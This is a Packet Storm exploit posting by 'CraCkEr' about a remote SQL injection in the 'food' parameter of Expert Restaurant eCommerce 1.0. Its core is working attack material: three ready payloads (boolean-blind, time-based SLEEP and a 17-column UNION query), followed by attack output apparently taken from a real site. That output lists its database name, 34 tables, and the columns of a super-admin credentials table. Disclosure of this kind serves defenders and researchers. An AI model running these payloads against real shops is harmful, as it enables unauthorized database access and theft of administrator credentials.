exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Expert Restaurant eCommerce 1.0 SQL Injection

Expert Restaurant eCommerce 1.0 SQL Injection
Posted Jun 8, 2023
Authored by CraCkEr

Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | b6e31497e8a7cc6ceef84e545a5a4c1b599505d08acbf2c30cc9b39d5a07c19b

Expert Restaurant eCommerce 1.0 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Vulnerability ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : https://www.codester.com/items/20872/ │
│ Vendor : Expert IT Solution │
│ Software : Expert Restaurant eCommerce 1.0 │
│ Vuln Type: SQL Injection │
│ Impact : Database Access │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ │
│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │
│ data and crash the application or make it unavailable, leading to lost revenue and │
│ damage to a company's reputation. │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/0x0CryptoJob

┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2023 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /food_details.php

https://www.website/food_details.php?food=[SQLI]


GET parameter 'food' is vulnerable to SQL Injection

---
Parameter: food (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV

Type: UNION query
Title: Generic UNION query (NULL) - 17 columns
Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---


[+] Starting the Attack

fetching current database
current database: 'sagor_****_restu'


fetching tables

[34 tables]
+--------------------------+
| add_to_cart_view |
| admin_url |
| contact_manage |
| currencies |
| customer_info |
| delivery_live_status |
| expense_manage |
| food_category |
| food_dish_manage |
| food_dish_vari_man |
| food_field_variant |
| food_field_variant_value |
| food_order_confirm |
| food_review |
| food_sub_category |
| food_tag |
| gallery_manage |
| hall_manage |
| income_manage |
| kitchen_live_sta |
| menu_manage |
| opening_manage |
| order_accounts |
| order_other_address |
| page_manage |
| payment_gateway |
| shipping_charge |
| site_setting |
| slider_manage |
| social_manage |
| sup_ad_log |
| table_book |
| table_manage |
| team_manage |
+--------------------------+


fetching columns for table 'sup_ad_log'

[5 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| status | varchar(100) |
| id | int(11) |
| sup_admin_name | varchar(100) |
| sup_pass | varchar(100) |
| sup_user | varchar(100) |
+----------------+--------------+


[-] Done
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close